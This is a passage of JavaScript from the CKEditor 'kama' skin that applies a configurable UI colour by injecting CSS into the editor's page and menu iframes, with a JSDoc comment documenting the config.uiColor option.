a.cke_disabled:focus .cke_icon_wrapper,\ .cke_skin_kama .cke_menuitem a.cke_disabled:active .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a.cke_disabled .cke_icon_wrapper\ {\ background-color: $color !important;\ border-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuseparator\ {\ background-color: $color !important;\ }\ \ .cke_skin_kama .cke_menuitem a:hover,\ .cke_skin_kama .cke_menuitem a:focus,\ .cke_skin_kama .cke_menuitem a:active\ {\ background-color: $color !important;\ }"; // We have to split CSS declarations for webkit. if ( CKEDITOR.env.webkit ) { uiColorMenuCss = uiColorMenuCss.split( '}' ).slice( 0, -1 ); for ( var i = 0 ; i < uiColorMenuCss.length ; i++ ) uiColorMenuCss[ i ] = uiColorMenuCss[ i ].split( '{' ); } function getStylesheet( document ) { var node = document.getById( uiColorStylesheetId ); if ( !node ) { node = document.getHead().append( 'style' ); node.setAttribute( "id", uiColorStylesheetId ); node.setAttribute( "type", "text/css" ); } return node; } function updateStylesheets( styleNodes, styleContent, replace ) { var r, i, content; for ( var id = 0 ; id < styleNodes.length ; id++ ) { if ( CKEDITOR.env.webkit ) { for ( i = 0 ; i < styleContent.length ; i++ ) { content = styleContent[ i ][ 1 ]; for ( r = 0 ; r < replace.length ; r++ ) content = content.replace( replace[ r ][ 0 ], replace[ r ][ 1 ] ); styleNodes[ id ].$.sheet.addRule( styleContent[ i ][ 0 ], content ); } } else { content = styleContent; for ( r = 0 ; r < replace.length ; r++ ) content = content.replace( replace[ r ][ 0 ], replace[ r ][ 1 ] ); if ( CKEDITOR.env.ie ) styleNodes[ id ].$.styleSheet.cssText += content; else styleNodes[ id ].$.innerHTML += content; } } } var uiColorRegexp = /\$color/g; CKEDITOR.tools.extend( editor, { uiColor: null, getUiColor : function() { return this.uiColor; }, setUiColor : function( color ) { var cssContent, uiStyle = getStylesheet( CKEDITOR.document ), cssId = '.' + editor.id; var cssSelectors = [ cssId + " .cke_wrapper", cssId + "_dialog .cke_dialog_contents", cssId + "_dialog a.cke_dialog_tab", cssId + "_dialog .cke_dialog_footer" ].join( ',' ); var cssProperties = "background-color: $color !important;"; if ( CKEDITOR.env.webkit ) cssContent = [ [ cssSelectors, cssProperties ] ]; else cssContent = cssSelectors + '{' + cssProperties + '}'; return ( this.setUiColor = function( color ) { var replace = [ [ uiColorRegexp, color ] ]; editor.uiColor = color; // Update general style. updateStylesheets( [ uiStyle ], cssContent, replace ); // Update menu styles. updateStylesheets( uiColorMenus, uiColorMenuCss, replace ); })( color ); } }); editor.on( 'menuShow', function( event ) { var panel = event.data[ 0 ]; var iframe = panel.element.getElementsByTag( 'iframe' ).getItem( 0 ).getFrameDocument(); // Add stylesheet if missing. if ( !iframe.getById( 'cke_ui_color' ) ) { var node = getStylesheet( iframe ); uiColorMenus.push( node ); var color = editor.getUiColor(); // Set uiColor for new menu. if ( color ) updateStylesheets( [ node ], uiColorMenuCss, [ [ uiColorRegexp, color ] ] ); } }); // Apply UI color if specified in config. if ( editor.config.uiColor ) editor.setUiColor( editor.config.uiColor ); } }; })() ); (function() { CKEDITOR.dialog ? dialogSetup() : CKEDITOR.on( 'dialogPluginReady', dialogSetup ); function dialogSetup() { CKEDITOR.dialog.on( 'resize', function( evt ) { var data = evt.data, width = data.width, height = data.height, dialog = data.dialog, contents = dialog.parts.contents; if ( data.skin != 'kama' ) return; contents.setStyles( { width : width + 'px', height : height + 'px' }); }); } })(); /** * The base user interface color to be used by the editor. Not all skins are * compatible with this setting. * @name CKEDITOR.config.uiColor * @type String * @default '' (empty) * @example * // Using a color code. * config.uiColor = '#AADC6E'; * @example * // Using an HTML color name. * config.uiColor = 'Gold'; */
JavaScript